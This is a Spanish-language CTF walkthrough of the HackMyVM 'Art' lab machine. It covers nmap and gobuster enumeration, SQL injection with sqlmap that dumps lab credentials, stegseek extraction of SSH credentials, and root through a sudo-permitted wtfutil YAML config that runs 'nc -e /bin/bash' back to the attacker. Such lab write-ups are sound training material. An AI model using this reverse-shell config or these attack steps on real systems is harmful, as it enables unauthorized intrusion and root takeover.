cd ~/blog

~/writeups/hmv/058-art.md

058 - Art

easy Linux hmv 31-03-2024
SQL Injection (sqlmap)Steganography (stegseek)sudo wtfutil config RCE
hackmyvm.eu/machines/machine.php?vm=Art

~1 min de lectura


Comenzamos enumerando puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.120
 nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.120
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-31 17:00 -03
Nmap scan report for 192.168.1.120
Host is up (0.00036s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 45:42:0f:13:cc:8e:49:dd:ec:f5:bb:0f:58:f4:ef:47 (RSA)
|   256 12:2f:a3:63:c2:73:99:e3:f8:67:57:ab:29:52:aa:06 (ECDSA)
|_  256 f8:79:7a:b1:a8:7e:e9:97:25:c3:40:4a:0c:2f:5e:69 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.57 seconds
 gobuster dir -u 'http://192.168.1.120' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png -r
...
/index.php            (Status: 200) [Size: 170]
...

En index.php hay un comentario sobre un parámetro tag:

<!-- Need to solve tag parameter problem. -->

El LFI no funciona, pero el parámetro es vulnerable a SQL Injection. Con sqlmap enumeramos y volcamos la base de datos:

 sqlmap -u "http://192.168.1.120/index.php?tag=" --dbs
available databases [2]:
[*] gallery
[*] information_schema

 sqlmap -u "http://192.168.1.120/index.php?tag=" -D gallery --dump
Database: gallery
Table: users
[8 entries]
+----+-----------------+--------+
| id | pass            | user   |
+----+-----------------+--------+
| 1  | realpazz        | mina   |
| 2  | mncxzKLLJDS     | me     |
| 3  | 987dsKLDSOIU    | lula   |
| 4  | BDSAOIUYEW      | notme  |
| 5  | dsOIUSDAOydsa   | mona   |
| 6  | EWQUDSAdaSDSA=  | admin  |
| 7  | VCXddsaEWQdsa_D | lila   |
| 8  | DSAewqDSAewq    | root   |
+----+-----------------+--------+

Table: art
[5 entries]
+----+-----------+---------------+
| id | tag       | image         |
+----+-----------+---------------+
| 1  | beautiful | abc321.jpg    |
| 2  | beautiful | jlk19990.jpg  |
| 3  | beautiful | ertye.jpg     |
| 4  | beautiful | zzxxccvv3.jpg |
| 5  | beauty    | dsa32.jpg     |
+----+-----------+---------------+

Las credenciales no funcionan, pero la imagen dsa32.jpg (que no habíamos analizado) esconde datos:

 stegseek -wl ~/Documentos/wordlists/rockyou.txt dsa32.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "yes.txt".
[i] Extracting to "dsa32.jpg.out".

 cat dsa32.jpg.out
lion/shel0vesyou

Con lion:shel0vesyou accedemos por SSH y obtenemos la primera flag. Revisamos sudo -l:

lion@art:~$ sudo -l
Matching Defaults entries for lion on art:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lion may run the following commands on art:
    (ALL : ALL) NOPASSWD: /bin/wtfutil

wtfutil carga un archivo de configuración YAML personalizado que permite ejecutar comandos (cmdrunner). Tomamos una plantilla y la editamos para lanzar una reverse shell:

 cat pwned.yml
wtf:
  grid:
    columns: [20, 20]
    rows: [3, 3]
  refreshInterval: 1
  mods:
    uptime:
      type: cmdrunner
      args: ['-e','/bin/bash','192.168.1.10','1234']
      cmd: "nc"
      enabled: true
      position:
        top: 0
        left: 0
        height: 1
        width: 1
      refreshInterval: 30
lion@art:~$ sudo /bin/wtfutil --config=pwned.yml

 ncat -nlvp 1234
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.120:33300.
id
uid=0(root) gid=0(root) grupos=0(root)

Buscamos la flag de root:

root@art:~# find / -name root.txt 2>/dev/null
/var/opt/root.txt

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados